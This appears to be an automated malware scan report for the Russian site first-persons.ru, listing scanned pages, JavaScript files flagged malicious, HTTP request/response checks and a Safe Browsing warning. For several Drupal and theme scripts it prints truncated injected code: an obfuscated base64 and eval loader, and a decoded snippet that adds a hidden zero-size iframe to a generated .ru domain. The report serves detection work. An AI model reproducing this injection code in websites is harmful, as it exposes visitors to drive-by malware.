Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=first-persons.ru
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://first-persons.ru/ | 200 OK Content-Length: 34815 Content-Type: text/html | clean |
http://first-persons.ru/misc/jquery.js | 200 OK Content-Length: 31008 Content-Type: application/javascript | clean |
http://first-persons.ru/misc/drupal.js | 200 OK Content-Length: 19624 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 Decoded script: var Drupal = Drupal || {}; /** * Set the variable that indicates if JavaScript behaviors should be applied */ Drupal.jsEnabled = document.getElementsByTagName && document.createElement && document.createTextNode && document.documentElement && document.getElementById; /** * Extends the current object with the parameter. Works recursively. */ Drupal.extend = function(obj) { for (var i in obj) { if (this[i]) { Antivirus reports:
| ||
http://first-persons.ru/sites/default/modules/jquery_update/compat.js | 200 OK Content-Length: 3537 Content-Type: application/javascript | clean |
http://first-persons.ru/sites/default/modules/lightbox2/js/lightbox.js | 200 OK Content-Length: 41769 Content-Type: application/javascript | clean |
http://first-persons.ru/themes/tapestry/js/jquery.pngFix.js | 200 OK Content-Length: 14521 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 Antivirus reports:
| ||
http://first-persons.ru/themes/tapestry/js/pickstyle.js | 200 OK Content-Length: 9984 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 Decoded script: function pickstyle(whichstyle) { var expireDate = new Date() var expstring=expireDate.setDate(expireDate.getDate()+30) document.cookie = "tapestrystyle=" + whichstyle + "; expires="+expireDate.toGMTString() } /*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[102,234,330,396,116,210,333,440,32,220,303,480,116,164,291,440,100 var b = generatePseudoRandomString(a, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + b + "/runforestrun?sid=cxc"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 2000 */ Antivirus reports:
| ||
http://first-persons.ru/themes/tapestry/js/pickicons.js | 200 OK Content-Length: 9982 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2 Decoded script: function pickicons(state) { var expireDate = new Date() var expstring=expireDate.setDate(expireDate.getDate()+30) document.cookie = "tapestryicons=" + state + "; expires="+expireDate.toGMTString() } /*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";e=window["eval"];n=[102,234,330,396,116,210,333,440,32,220,303,480,116,164,291,440,100,222,327,3 var b = generatePseudoRandomString(a, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + b + "/runforestrun?sid=cxc"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 2000 */ Antivirus reports:
| ||
http://first-persons.ru/about | 200 OK Content-Length: 15945 Content-Type: text/html | clean |
http://first-persons.ru/order | 200 OK Content-Length: 15767 Content-Type: text/html | clean |
http://first-persons.ru/contact | 200 OK Content-Length: 14513 Content-Type: text/html | clean |
http://first-persons.ru/misc/textarea.js | 200 OK Content-Length: 1248 Content-Type: application/javascript | clean |
http://first-persons.ru/category/1/1 | 200 OK Content-Length: 29286 Content-Type: text/html | clean |
http://first-persons.ru/category/1/2 | 200 OK Content-Length: 19355 Content-Type: text/html | clean |
http://first-persons.ru/category/1/3 | 200 OK Content-Length: 18605 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: first-persons.ru
Result:
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Connection: close
Date: Sat, 27 Dec 2014 13:34:05 GMT
ETag: "0c36a13c1aaf95cb205e63ef4b742b22"
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 16 May 2014 16:35:51 GMT
Set-Cookie: SESS657fde95c3fac9c2773bc4c84faa51cd=c7c4532e766c1ea302ed3767ace6727a; expires=Mon, 19-Jan-2015 17:07:25 GMT; path=/; domain=.first-persons.ru
GET / HTTP/1.1
Host: first-persons.ru
Result:
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Connection: close
Date: Sat, 27 Dec 2014 13:34:05 GMT
ETag: "0c36a13c1aaf95cb205e63ef4b742b22"
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 16 May 2014 16:35:51 GMT
Set-Cookie: SESS657fde95c3fac9c2773bc4c84faa51cd=c7c4532e766c1ea302ed3767ace6727a; expires=Mon, 19-Jan-2015 17:07:25 GMT; path=/; domain=.first-persons.ru
Second query (visit from search engine):
GET / HTTP/1.1
Host: first-persons.ru
Referer: http://www.google.com/search?q=first-persons.ru
Result:
The result is similar to that of the first query; no suspicious redirects were found.
GET / HTTP/1.1
Host: first-persons.ru
Referer: http://www.google.com/search?q=first-persons.ru
Result:
The result is similar to that of the first query; no suspicious redirects were found.